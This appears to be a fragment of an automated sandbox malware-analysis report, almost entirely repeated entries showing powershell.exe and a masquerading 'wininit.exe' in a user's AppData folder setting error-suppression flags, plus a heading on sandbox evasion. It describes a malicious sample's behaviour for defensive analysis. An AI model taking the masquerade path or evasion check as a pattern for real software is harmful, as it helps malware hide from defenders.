                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Check if machine is in data center or colocation facility
